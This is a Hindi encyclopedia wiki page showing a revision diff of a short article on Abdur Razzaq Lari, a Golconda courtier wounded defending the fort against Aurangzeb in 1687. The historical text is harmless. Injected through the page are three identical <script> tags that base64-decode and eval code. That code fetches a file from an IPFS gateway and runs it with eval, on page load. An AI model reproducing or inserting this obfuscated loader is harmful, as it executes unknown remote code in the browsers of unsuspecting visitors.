Difference between revisions of "अब्दुर्रज्जाक लारी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
*अब्दुर्रज्जाक लारी [[गोलकुंडा]] के आख़िरी सुल्तान का दरबारी और सिपहसलार था।  
 
*अब्दुर्रज्जाक लारी [[गोलकुंडा]] के आख़िरी सुल्तान का दरबारी और सिपहसलार था।  
*1687 ई. में जब [[औरंगज़ेब]] ने गोलकुंडा पर अन्तिम आक्रमण किया, तो उसने अब्दुर्रज्जाक को अनेक लालच दिये, वह पर न डिगा और बहादुरी से गोलकुंडा की रक्षा करते हुए उसके 70 घाव लगे।  
+
*1687 ई. में जब [[औरंगज़ेब]] ने [[गोलकुंडा]] पर अन्तिम आक्रमण किया, तो उसने अब्दुर्रज्जाक को अनेक लालच दिये, वह पर न डिगा और बहादुरी से गोलकुंडा की रक्षा करते हुए उसके 70 घाव लगे।  
 
*इसके बाद में औरंगज़ेब ने उसका इलाज कराया और उसे [[मुग़ल]] दरबार में ऊँचा पद प्रदान किया।
 
*इसके बाद में औरंगज़ेब ने उसका इलाज कराया और उसे [[मुग़ल]] दरबार में ऊँचा पद प्रदान किया।
  
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{मध्य काल}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 +
[[Category:मध्य काल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:52, 13 April 2011

  • abdurrajjak lari golakuanda ke akhiri sultan ka darabari aur sipahasalar tha.
  • 1687 ee. mean jab aurangazeb ne golakuanda par antim akraman kiya, to usane abdurrajjak ko anek lalach diye, vah par n diga aur bahaduri se golakuanda ki raksha karate hue usake 70 ghav lage.
  • isake bad mean aurangazeb ne usaka ilaj karaya aur use mugal darabar mean ooancha pad pradan kiya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>